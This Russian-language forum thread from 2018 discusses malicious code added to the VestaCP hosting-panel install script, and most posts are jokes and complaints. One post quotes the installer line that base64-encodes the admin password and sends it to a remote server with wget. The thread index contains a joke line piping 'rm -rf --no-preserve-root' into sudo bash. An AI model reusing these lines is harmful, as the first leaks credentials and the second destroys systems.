Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Режим отображения только ответов первого уровня		[ Отслеживать ]

Злоумышленники добавили вредоносный код в скрипт установки х..., opennews (??), 18-Окт-18, (0) [смотреть все] Ух Хорошо зашли , Аноним (1), 13:47 , 18-Окт-18, (1) +16   // ха-а-арошая какая телеметрия она еще и запросы штатно принимает вообще класс , А (??), 14:51 , 18-Окт-18, (7) +5 // А ты как собираешься без запросов спросить телеметрию, умник , Аноним (10), 16:26 , 18-Окт-18, (10) –20 // А не надо её спрашивать Можно сделать, чтобы клиент телеметрии сам отправлял её, Аноним (11), 16:49 , 18-Окт-18, (11) +15 Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaC, Himik (ok), 18:56 , 18-Окт-18, (17) +1 // Ага, рабочая станция значит, так А если рабочая станция отвечает, то сервер, бли, Аноним (22), 23:32 , 18-Окт-18, (22) Ш10 отправляет ваши данные в микрософт говорили они , Ирокез (?), 19:58 , 18-Окт-18, (19) // Дурной пример заразителен Веб-абизянки тоже хотят быть как большая компания , Аноним (-), 08:26 , 19-Окт-18, (25) +1 Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-автор, mikhailnov (ok), 14:07 , 18-Окт-18, (2) –1   // Если не забывать о том, что введенные вами логин пароль пробрасываются в весту в, Аноним (3), 14:29 , 18-Окт-18, (3) +5 // Наш ответ https hackage haskell org package sproxy2, Аноним (31), 16:42 , 19-Окт-18, (31) –2 Как это спасёт от бэкдора в установочном скрипте Безопасности удалятся 0, инф, Аноним (8), 15:06 , 18-Окт-18, (8) +1 171 поставил себе вирус закрыл файрволлом я хаккир 187 , scorry (ok), 15:47 , 18-Окт-18, (9) +9 На что только не пойдут, лишь бы консолью не пользоваться , th3m3 (ok), 16:59 , 18-Окт-18, (13) +7 // Ваш комментарий огорчает молодых специалистов , Аноним (15), 18:13 , 18-Окт-18, (15) +8 Ох и рeшето других слов просто нет , CHERTS (ok), 14:37 , 18-Окт-18, (4) +1   Давно знал что майкрософты ужасное по делают, Аноним (5), 14:39 , 18-Окт-18, (5) –4   Я давно говорил, что все эти панели - добром не кончатся И ведь не первая новос, th3m3 (ok), 16:53 , 18-Окт-18, (12) +3   // Не зря матери дочерей учат - Кто не учился, те работают на панели и заразы всяк, FedeX (ok), 17:09 , 18-Окт-18, (14) +7 // А потому служат Нурглу и Слаанеш сразу , Аноним (18), 19:25 , 18-Окт-18, (18) +2 статья ваша ниочем сотрудники vesta сами добавили сбор пароля от admin в инстал, Аноним (16), 18:36 , 18-Окт-18, (16) +1   // Но зачем , Борщдрайвен бигдата (?), 20:41 , 18-Окт-18, (20) +2 // Cause they can, очевидно же , Типа хомячок (?), 23:04 , 18-Окт-18, (21) +3 Шикарно И это тот случай, когда открытые исходники не помогут те, кто умеет их , KonstantinB (??), 06:26 , 19-Окт-18, (23) +1 // хинт те кто умеет их читать, не пользуются панелями, а продают их как услугу П, нах (?), 10:37 , 19-Окт-18, (28) // Ой, не напоминайте мне об этих убожествах Слава яйцам, в последние лет 5 это вс, KonstantinB (ok), 04:03 , 20-Окт-18, (37) угу, нет другого интернета кроме вконтактега и мордокнижечки, и товарищ майор пр, пох (?), 10:46 , 20-Окт-18, (39) –1 Это ты так думаешь В мире мало того что куча VPS ок с предустановленной панелью, Vitaliy Blats (?), 12:40 , 20-Окт-18, (40) –1 на самом деле нам его уже сделал жопорукий аутсорсер, осталось выложить Он, коне, пох (?), 19:35 , 20-Окт-18, (41) Хорошую вещь CP не назовут , odd.mean (ok), 07:38 , 19-Окт-18, (24)   // И альта-вистой тоже , Аноним (26), 09:41 , 19-Окт-18, (26) а CP M , Аноним (44), 06:23 , 21-Окт-18, (44) // Ну разве что CP M Да и то , odd.mean (ok), 08:40 , 21-Окт-18, (45) Есть Ajenti не вижу смысла в существовании этого плохо-кода , Аноним (26), 09:44 , 19-Окт-18, (27) –2   // Есть software_name1 не вижу смысла в существовании этого software_name2 , Vitaliy Blats (?), 12:17 , 19-Окт-18, (30) +1 Fuck mehttps github com serghey-rodin vesta Download the installation scrip, Аноним (31), 21:06 , 19-Окт-18, (32)   // прости, а то что он тебе понаустановит - ты запускать вообще не планируешь Или , пох (?), 21:46 , 19-Окт-18, (33) –2 // Вам следует настроить свой камертон на curl http , Грусть (?), 22:59 , 19-Окт-18, (34) +1 // ой, какой ужас, злые соседи э какие нахрен соседи, мы что дома ставимся Злы, пох (?), 19:39 , 20-Окт-18, (42) echo rm -rf --no-preserve-root 124 sudo bash, Аноним (35), 23:16 , 19-Окт-18, (35) curl2bash 8482 , Аноним (36), 01:43 , 20-Окт-18, (36) // есть уже curl --rootme , annual slayer (?), 06:45 , 20-Окт-18, (38) 1,2,4,5,12,16,24,27,32

Сообщения

[Сортировка по времени | RSS]

1. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+16 +/–
Сообщение от Аноним (1), 18-Окт-18, 13:47
> штатную систему отправки телеметрии Ух. Хорошо зашли.
Ответить | Правка | Наверх | Cообщить модератору

есть ответы, показать

2. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–1 +/–
Сообщение от mikhailnov (ok), 18-Окт-18, 14:07
Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-авторизацию средствами nginx. Уже вторая уязвимость мимо.
Ответить | Правка | Наверх | Cообщить модератору

есть ответы, показать

4. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
Сообщение от CHERTS (ok), 18-Окт-18, 14:37
Ох и рeшето... других слов просто нет.
Ответить | Правка | Наверх | Cообщить модератору

5. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–4 +/–
Сообщение от Аноним (5), 18-Окт-18, 14:39
Давно знал что майкрософты ужасное по делают
Ответить | Правка | Наверх | Cообщить модератору

12. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+3 +/–
Сообщение от th3m3 (ok), 18-Окт-18, 16:53
Я давно говорил, что все эти панели - добром не кончатся. И ведь не первая новость про эту Весту. Давно отказался от этих ваших панелей и жить стало лучше и веселее, особенно когда читаю такие новости, про очередной косяк с панелями.
Ответить | Правка | Наверх | Cообщить модератору

есть ответы, показать

16. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
Сообщение от Аноним (16), 18-Окт-18, 18:36
статья ваша ниочем. сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили. codename="$codename:$(echo $vpass:$servername | base64)" wget vestacp.com/notify/?$codename -O /dev/null -q https://github.com/serghey-rodin/vesta/commit/a3f0fa1501d424... https://github.com/serghey-rodin/vesta/commit/ee03eff016e03c... а взломщики скорее взяли их из лога сервера vestacp - куда они отправлялись инсталлятором а ссылка http://vestacp.com/test/?ip=127.0.0.1 для проверки ip вашего сервера (есть ли он в логах или нет)
Ответить | Правка | Наверх | Cообщить модератору

есть ответы, показать

24. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
Сообщение от odd.mean (ok), 19-Окт-18, 07:38
Хорошую вещь "CP" не назовут.
Ответить | Правка | Наверх | Cообщить модератору

есть ответы, показать

27. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–2 +/–
Сообщение от Аноним (26), 19-Окт-18, 09:44
Есть Ajenti не вижу смысла в существовании этого плохо-кода.
Ответить | Правка | Наверх | Cообщить модератору

есть ответы, показать

32. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
Сообщение от Аноним (31), 19-Окт-18, 21:06
Fuck me https://github.com/serghey-rodin/vesta: ``` Download the installation script: curl -O http://vestacp.com/pub/vst-install.sh Then run it: bash vst-install.sh ```
Ответить | Правка | Наверх | Cообщить модератору

есть ответы, показать

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема